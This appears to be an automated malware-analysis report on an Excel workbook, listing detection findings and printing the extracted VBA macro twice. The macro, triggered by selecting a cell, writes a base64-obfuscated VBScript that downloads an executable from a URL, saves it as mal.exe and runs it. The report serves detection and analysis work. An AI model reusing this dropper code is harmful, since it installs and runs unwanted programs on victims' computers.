MALICIOUS
244
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "wscript C:\Users\Soheil\Desktop\j.vbs" -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Shell "wscript C:\Users\Soheil\Desktop\j.vbs" -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
Print #PayLoadFile, bd("IC53cml0ZSB4LnJlc3BvbnNlQm9keQ==") ' .write x.responseBody' -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.cardbox.com/download/samples1.exe Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10340 bytes |
SHA-256: 3471795b50d6182390a7cdbdafe659b3a30ca770b8e7343e8195e86998d231f9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
If Selection.Count = 1 Then
If Not Intersect(Target, Range("S200")) Is Nothing Then
Call Module1.MyMacro
End If
End If
End Sub
Sub MyMacro()
Dim PayLoadFile As Integer
Dim FilePath As String
FilePath = "C:\Users\Soheil\Desktop\j.vbs"
PayLoadFile = FreeFile
Open FilePath For Output As PayLoadFile
Print #PayLoadFile, bd("ZGltIHg6IFNldCB4ID0gY3JlYXRlb2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIp") 'dim x: Set x = createobject("Microsoft.XMLHTTP")'
Print #PayLoadFile, bd("IGRpbSBiOiBTZXQgYiA9IGNyZWF0ZW9iamVjdCgiQWRvZGIuU3RyZWFtIik=") 'dim b: Set b = createobject("Adodb.Stream")'
Print #PayLoadFile, bd(bd("SUhndVQzQmxiaUFpUjBWVUlpd2dJbWgwZEhCek9pOHZkM2QzTG1OaGNtUmliM2d1WTI5dEwyUnZkMjVzYjJGa0wzTmhiWEJzWlhNeExtVjRaU0lzSUVaaGJITmw=")) ' x.Open "GET", "https://www.cardbox.com/download/samples1.exe", False'
Print #PayLoadFile, bd("IHguU2VuZA==") 'x.Send'
Print #PayLoadFile, bd("IHdpdGggYg==") ' with b'
Print #PayLoadFile, bd("IC50eXBlID0gMQ==") ' .type = 1'
Print #PayLoadFile, bd("IC5vcGVu") ' .open'
Print #PayLoadFile, bd("IC53cml0ZSB4LnJlc3BvbnNlQm9keQ==") ' .write x.responseBody'
Print #PayLoadFile, bd("LnNhdmV0b2ZpbGUiQzpcVXNlcnNcU29oZWlsXERlc2t0b3BcbWFsLmV4ZSIsIDI=") ' .savetofile "C:\Users\Soheil\Desktop\mal.exe", 2'
Print #PayLoadFile, bd("IGVuZCB3aXRo") 'end with'
Close PayLoadFile
Shell "wscript C:\Users\Soheil\Desktop\j.vbs"
Application.Wait (Now + TimeValue("0:00:03"))
Shell "C:\Users\Soheil\Desktop\mal.exe"
End Sub
Function be(inData)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim cOut, sOut, I
For I = 1 To Len(inData) Step 3
Dim nGroup, pOut, sGroup
nGroup = &H10000 * Asc(Mid(inData, I, 1)) + _
&H100 * MyASC(Mid(inData, I + 1, 1)) + MyASC(Mid(inData, I + 2, 1))
nGroup = Oct(nGroup)
nGroup = String(8 - Len(nGroup), "0") & nGroup
pOut = Mid(Base64, CLng("&o" & Mid(nGroup, 1, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 3, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 5, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 7, 2)) + 1, 1)
sOut = sOut + pOut
Next
Select Case Len(inData) Mod 3
Case 1:
sOut = Left(sOut, Len(sOut) - 2) + "=="
Case 2:
sOut = Left(sOut, Len(sOut) - 1) + "="
End Select
be = sOut
End Function
Function MyASC(OneChar)
If OneChar = "" Then MyASC = 0 Else MyASC = Asc(OneChar)
End Function
Function bd(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "bd", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "bd", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
bd = sOut
End Function
Attribute VB_Name = "Module2"
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
If Selection.Count = 1 Then
If Not Intersect(Target, Range("D420")) Is Nothing Then
Call ghd
End If
End If
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook2"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
If Selection.Count = 1 Then
If Not Intersect(Target, Range("S200")) Is Nothing Then
Call Module1.MyMacro
End If
End If
End Sub
Sub MyMacro()
Dim PayLoadFile As Integer
Dim FilePath As String
FilePath = "C:\Users\Soheil\Desktop\j.vbs"
PayLoadFile = FreeFile
Open FilePath For Output As PayLoadFile
Print #PayLoadFile, bd("ZGltIHg6IFNldCB4ID0gY3JlYXRlb2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIp") 'dim x: Set x = createobject("Microsoft.XMLHTTP")'
Print #PayLoadFile, bd("IGRpbSBiOiBTZXQgYiA9IGNyZWF0ZW9iamVjdCgiQWRvZGIuU3RyZWFtIik=") 'dim b: Set b = createobject("Adodb.Stream")'
Print #PayLoadFile, bd(bd("SUhndVQzQmxiaUFpUjBWVUlpd2dJbWgwZEhCek9pOHZkM2QzTG1OaGNtUmliM2d1WTI5dEwyUnZkMjVzYjJGa0wzTmhiWEJzWlhNeExtVjRaU0lzSUVaaGJITmw=")) ' x.Open "GET", "https://www.cardbox.com/download/samples1.exe", False'
Print #PayLoadFile, bd("IHguU2VuZA==") 'x.Send'
Print #PayLoadFile, bd("IHdpdGggYg==") ' with b'
Print #PayLoadFile, bd("IC50eXBlID0gMQ==") ' .type = 1'
Print #PayLoadFile, bd("IC5vcGVu") ' .open'
Print #PayLoadFile, bd("IC53cml0ZSB4LnJlc3BvbnNlQm9keQ==") ' .write x.responseBody'
Print #PayLoadFile, bd("LnNhdmV0b2ZpbGUiQzpcVXNlcnNcU29oZWlsXERlc2t0b3BcbWFsLmV4ZSIsIDI=") ' .savetofile "C:\Users\Soheil\Desktop\mal.exe", 2'
Print #PayLoadFile, bd("IGVuZCB3aXRo") 'end with'
Close PayLoadFile
Shell "wscript C:\Users\Soheil\Desktop\j.vbs"
Application.Wait (Now + TimeValue("0:00:03"))
Shell "C:\Users\Soheil\Desktop\mal.exe"
End Sub
Function be(inData)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim cOut, sOut, I
For I = 1 To Len(inData) Step 3
Dim nGroup, pOut, sGroup
nGroup = &H10000 * Asc(Mid(inData, I, 1)) + _
&H100 * MyASC(Mid(inData, I + 1, 1)) + MyASC(Mid(inData, I + 2, 1))
nGroup = Oct(nGroup)
nGroup = String(8 - Len(nGroup), "0") & nGroup
pOut = Mid(Base64, CLng("&o" & Mid(nGroup, 1, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 3, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 5, 2)) + 1, 1) + _
Mid(Base64, CLng("&o" & Mid(nGroup, 7, 2)) + 1, 1)
sOut = sOut + pOut
Next
Select Case Len(inData) Mod 3
Case 1:
sOut = Left(sOut, Len(sOut) - 2) + "=="
Case 2:
sOut = Left(sOut, Len(sOut) - 1) + "="
End Select
be = sOut
End Function
Function MyASC(OneChar)
If OneChar = "" Then MyASC = 0 Else MyASC = Asc(OneChar)
End Function
Function bd(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "bd", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "bd", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
bd = sOut
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 54272 bytes |
SHA-256: 3b6251e707b2bac81760cefadb3fb32befc8f11f647a997bbeb0f7c72d1c02c6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.